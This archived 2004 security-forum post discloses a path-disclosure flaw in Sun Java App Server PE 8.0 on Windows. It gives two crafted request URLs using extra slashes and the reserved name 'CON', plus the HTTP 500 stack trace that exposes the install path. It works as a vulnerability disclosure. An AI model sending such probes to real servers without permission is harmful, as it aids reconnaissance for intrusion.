hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Sun-java-app-server Pe 8.0 Path Disclosure
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
May 29 2004, 05:29 PM
QUOTE


Hi,

when doing the following requests consequently against a Sun-Java-App-Server
PE 8.0 a Windows Box

http://127.0.0.1:8080////
http://127.0.0.1:8080////CON

you get a HTTP 500 Error, which reveals the installation path and the fact
that the server is running on a WinDos box (see details below) ....

Cheers
Marc



HTTP Status 500 -

type Exception report

message

description The server encountered an internal error () that prevented it
from fulfilling this request.

exception

java.io.FileNotFoundException:
C:\Programme\Sun\AppServer\domains\domain1\docroot\CON (Zugriff verweigert)
java.io.FileInputStream.open(Native
Method)
java.io.FileInputStream.(FileInputStream.java:106)

org.apache.naming.resources.FileDirContext$FileResource.streamContent(FileDirContext.java:1060)

org.apache.catalina.servlets.DefaultServlet$ResourceInfo.getStream(DefaultServlet.java:2504)

org.apache.catalina.servlets.DefaultServlet.copy(DefaultServlet.java:1938)

org.apache.catalina.servlets.DefaultServlet.serveResource(DefaultServlet.java:1057)

org.apache.catalina.servlets.DefaultServlet.doGet(DefaultServlet.java:518)
javax.servlet.http.HttpServlet.service(HttpServlet.java:748)
javax.servlet.http.HttpServlet.service(HttpServlet.java:861)
sun.reflect.GeneratedMethodAccessor67.invoke(Unknown
Source)

sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
java.lang.reflect.Method.invoke(Method.java:324)
org.apache.catalina.security.SecurityUtil$1.run(SecurityUtil.java:289)
java.security.AccessController.doPrivileged(Native
Method)
javax.security.auth.Subject.doAsPrivileged(Subject.java:500)
org.apache.catalina.security.SecurityUtil.execute(SecurityUtil.java:311)

org.apache.catalina.security.SecurityUtil.doAsPrivilege(SecurityUtil.java:205)

note The full stack trace of the root cause is available in the
Sun-Java-System/Application-Server-PE-8.0 logs.
Sun-Java-System/Application-Server-PE-8.0


This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.